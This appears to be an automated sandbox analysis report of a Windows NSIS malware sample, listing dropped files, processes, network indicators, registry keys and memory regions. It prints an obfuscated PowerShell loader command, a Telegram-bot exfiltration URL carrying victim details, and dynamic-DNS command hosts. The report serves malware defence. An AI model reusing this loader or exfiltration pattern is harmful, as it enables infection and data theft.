Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
NDQ211216GM08.exe.bin.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Nonalined.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Nonalined.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x1c80b452, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Faktureringsmaskinerne.Cre
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan
|
Unicode text, UTF-8 text, with very long lines (3065), with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Forsnvringers.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Importrer.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Saxons.jpg
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 742x434, components
3
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\baandstationerne\ultraliberal.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\eneanpartshaveren.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\maanedsbladene.pyt
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\treenighed.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42gdj45o.azy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0q3vm2.eyf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh3qeqop.d1b.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzxfuefn.qgj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe
|
"C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
|
||
C:\Users\user\AppData\Local\Temp\Nonalined.exe
|
"C:\Users\user\AppData\Local\Temp\Nonalined.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.189
|
104.21.80.1
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://www.ecosia.org/newtab/v20Y&
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
http://varders.kozow.com:8081
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
|
unknown
|
||
http://checkip.dyndns.org/
|
193.122.130.0
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://aka.ms/pscore6lBjr
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
https://chrome.google.com/webstore?hl=enlBjr
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://reallyfreegeoip.org/xml/
|
unknown
|
||
https://drive.google.com/9A
|
unknown
|
||
https://www.office.com/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://ac.ecosia.org?q=
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
http://checkip.dyndns.org
|
unknown
|
||
https://chrome.google.com/webstore?hl=en4
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.office.com/lBjr
|
unknown
|
||
http://aborters.duckdns.org:8081
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
http://crl.m
|
unknown
|
||
https://www.office.com/4
|
unknown
|
||
https://g.live.com/odclientsettings/Prod-C:
|
unknown
|
||
http://anotherarmy.dns.army:8081
|
unknown
|
||
https://duckduckgo.com/chrome_newtabv20
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV2-C:
|
unknown
|
||
https://reallyfreegeoip.org/xml/8.46.123.189$
|
unknown
|
||
https://reallyfreegeoip.org
|
unknown
|
||
https://drive.google.com/qA
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
https://gemini.google.com/app?q=
|
unknown
|
There are 43 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.74.206
|
||
drive.usercontent.google.com
|
142.250.186.129
|
||
reallyfreegeoip.org
|
104.21.80.1
|
||
api.telegram.org
|
149.154.167.220
|
||
checkip.dyndns.com
|
193.122.130.0
|
||
checkip.dyndns.org
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.186.129
|
drive.usercontent.google.com
|
United States
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
142.250.74.206
|
drive.google.com
|
United States
|
||
193.122.130.0
|
checkip.dyndns.com
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
104.21.80.1
|
reallyfreegeoip.org
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
20251000
|
trusted library allocation
|
page read and write
|
||
A131000
|
direct allocation
|
page execute and read and write
|
||
20550000
|
trusted library allocation
|
page read and write
|
||
6DFE000
|
stack
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2043D000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
819A000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page execute and read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EF29FE000
|
unkown
|
page readonly
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
2527F0F0000
|
heap
|
page read and write
|
||
AD000
|
trusted library allocation
|
page execute and read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2527EE13000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
229E0000
|
heap
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2520450E000
|
heap
|
page read and write
|
||
4030000
|
direct allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
21251000
|
trusted library allocation
|
page read and write
|
||
25204614000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EC0000
|
heap
|
page read and write
|
||
810D000
|
heap
|
page read and write
|
||
7EF28FE000
|
unkown
|
page readonly
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
252043D0000
|
trusted library allocation
|
page read and write
|
||
6F6000
|
heap
|
page read and write
|
||
21302000
|
trusted library allocation
|
page read and write
|
||
25204400000
|
heap
|
page read and write
|
||
9E0000
|
trusted library allocation
|
page read and write
|
||
25205000000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
23597000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2527EE7C000
|
heap
|
page read and write
|
||
B6000
|
trusted library allocation
|
page execute and read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
815A000
|
heap
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2527F991000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
D3C000
|
stack
|
page read and write
|
||
2527EE2B000
|
heap
|
page read and write
|
||
2527FC40000
|
trusted library allocation
|
page read and write
|
||
7240000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
3E90000
|
heap
|
page read and write
|
||
235F0000
|
trusted library allocation
|
page read and write
|
||
7FAE000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
A20000
|
trusted library allocation
|
page read and write
|
||
203E1000
|
trusted library allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
6F70000
|
trusted library allocation
|
page read and write
|
||
204F7000
|
trusted library allocation
|
page read and write
|
||
7EF21FE000
|
unkown
|
page readonly
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
223F0000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
252046A0000
|
trusted library allocation
|
page read and write
|
||
7E3000
|
heap
|
page read and write
|
||
69F0000
|
direct allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
25204506000
|
heap
|
page read and write
|
||
44B0000
|
trusted library allocation
|
page read and write
|
||
22F7E000
|
stack
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
70A01000
|
unkown
|
page execute read
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20C0000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
3F07000
|
heap
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
2527EE40000
|
heap
|
page read and write
|
||
2527EE94000
|
heap
|
page read and write
|
||
4149000
|
heap
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
223AA000
|
heap
|
page read and write
|
||
6E3E000
|
stack
|
page read and write
|
||
6BE0000
|
heap
|
page read and write
|
||
4990000
|
direct allocation
|
page read and write
|
||
23410000
|
trusted library allocation
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
213D6000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
4B26000
|
trusted library allocation
|
page read and write
|
||
25204600000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
235B0000
|
trusted library allocation
|
page read and write
|
||
4183000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
40D8000
|
heap
|
page read and write
|
||
4070000
|
direct allocation
|
page read and write
|
||
4183000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
25204455000
|
heap
|
page read and write
|
||
4425000
|
heap
|
page execute and read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
20403000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page readonly
|
||
252043B0000
|
trusted library allocation
|
page read and write
|
||
1FB7F000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
235D0000
|
trusted library allocation
|
page read and write
|
||
20557000
|
trusted library allocation
|
page read and write
|
||
10E000
|
stack
|
page read and write
|
||
4181000
|
heap
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
2527EDF0000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FDFA000
|
stack
|
page read and write
|
||
235B0000
|
trusted library allocation
|
page read and write
|
||
2527FFA0000
|
trusted library section
|
page readonly
|
||
80E8000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
3651000
|
remote allocation
|
page execute and read and write
|
||
427000
|
unkown
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EF1EFC000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
21434000
|
trusted library allocation
|
page read and write
|
||
9D000
|
trusted library allocation
|
page execute and read and write
|
||
3EF0000
|
direct allocation
|
page read and write
|
||
2527EE73000
|
heap
|
page read and write
|
||
ABE000
|
stack
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
25204610000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
7EF2EFE000
|
unkown
|
page readonly
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
4149000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
252043E0000
|
trusted library allocation
|
page read and write
|
||
7EF237E000
|
stack
|
page read and write
|
||
8120000
|
heap
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
70A03000
|
unkown
|
page read and write
|
||
7EF287E000
|
stack
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
80E0000
|
heap
|
page read and write
|
||
9731000
|
direct allocation
|
page execute and read and write
|
||
2058A000
|
trusted library allocation
|
page read and write
|
||
2527EE5B000
|
heap
|
page read and write
|
||
305F000
|
stack
|
page read and write
|
||
202B5000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
748000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2144A000
|
trusted library allocation
|
page read and write
|
||
7D5D000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
270C000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
7D9E000
|
stack
|
page read and write
|
||
2021D000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
252044D3000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
4143000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
23450000
|
trusted library allocation
|
page read and write
|
||
4116000
|
heap
|
page read and write
|
||
711B000
|
heap
|
page read and write
|
||
180000
|
trusted library allocation
|
page read and write
|
||
2307F000
|
stack
|
page read and write
|
||
4040000
|
direct allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
21558000
|
trusted library allocation
|
page read and write
|
||
6A10000
|
direct allocation
|
page read and write
|
||
23410000
|
trusted library allocation
|
page read and write
|
||
204C1000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
6F80000
|
trusted library allocation
|
page read and write
|
||
20240000
|
heap
|
page execute and read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
9C0000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
23460000
|
trusted library allocation
|
page read and write
|
||
2527F702000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
2527F713000
|
heap
|
page read and write
|
||
43FE000
|
stack
|
page read and write
|
||
20547000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
252043C0000
|
trusted library allocation
|
page read and write
|
||
D80000
|
trusted library allocation
|
page execute and read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20335000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
7199000
|
heap
|
page read and write
|
||
7117000
|
heap
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
20412000
|
trusted library allocation
|
page read and write
|
||
7EF36FE000
|
unkown
|
page readonly
|
||
1FDB0000
|
direct allocation
|
page read and write
|
||
20E0000
|
heap
|
page read and write
|
||
2527EE78000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
3F05000
|
heap
|
page read and write
|
||
59F9000
|
trusted library allocation
|
page read and write
|
||
81B6000
|
heap
|
page read and write
|
||
234E0000
|
trusted library allocation
|
page read and write
|
||
4980000
|
direct allocation
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
252043D0000
|
trusted library allocation
|
page read and write
|
||
8054000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
8304000
|
trusted library allocation
|
page read and write
|
||
20301000
|
trusted library allocation
|
page read and write
|
||
A30000
|
heap
|
page execute and read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
26E1000
|
unkown
|
page readonly
|
||
8B7B000
|
stack
|
page read and write
|
||
4060000
|
direct allocation
|
page read and write
|
||
7142000
|
heap
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
20541000
|
trusted library allocation
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2040D000
|
trusted library allocation
|
page read and write
|
||
23420000
|
trusted library allocation
|
page read and write
|
||
25204770000
|
remote allocation
|
page read and write
|
||
201FE000
|
trusted library allocation
|
page read and write
|
||
7EF26FB000
|
stack
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
223F6000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FBBE000
|
stack
|
page read and write
|
||
22B70000
|
heap
|
page execute and read and write
|
||
4A29000
|
trusted library allocation
|
page read and write
|
||
5A36000
|
trusted library allocation
|
page read and write
|
||
7EF25FE000
|
unkown
|
page readonly
|
||
72D0000
|
trusted library allocation
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
5AE000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
6BD0000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20222000
|
trusted library allocation
|
page read and write
|
||
419C000
|
heap
|
page read and write
|
||
201EE000
|
stack
|
page read and write
|
||
2708000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
5B65000
|
trusted library allocation
|
page read and write
|
||
23420000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
7220000
|
trusted library allocation
|
page execute and read and write
|
||
23440000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
252044DE000
|
heap
|
page read and write
|
||
190000
|
trusted library allocation
|
page read and write
|
||
213BA000
|
trusted library allocation
|
page read and write
|
||
23430000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
7EF1FFE000
|
unkown
|
page readonly
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20040000
|
heap
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
223F0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
59F5000
|
trusted library allocation
|
page read and write
|
||
1F90E000
|
stack
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
69D0000
|
direct allocation
|
page read and write
|
||
252044FC000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
3E7000
|
stack
|
page read and write
|
||
734B000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
20545000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
6F90000
|
trusted library allocation
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
6F0000
|
heap
|
page read and write
|
||
72B0000
|
trusted library allocation
|
page read and write
|
||
C2000
|
trusted library allocation
|
page read and write
|
||
2527EE7A000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
230BE000
|
stack
|
page read and write
|
||
252046A0000
|
trusted library allocation
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page execute and read and write
|
||
98000
|
stack
|
page read and write
|
||
413C000
|
heap
|
page read and write
|
||
7E34000
|
trusted library allocation
|
page read and write
|
||
234C0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
21631000
|
trusted library allocation
|
page read and write
|
||
5B7A000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
4146000
|
heap
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
6F47000
|
trusted library allocation
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
1FD10000
|
remote allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
454000
|
unkown
|
page readonly
|
||
22394000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
203CE000
|
trusted library allocation
|
page read and write
|
||
25204633000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
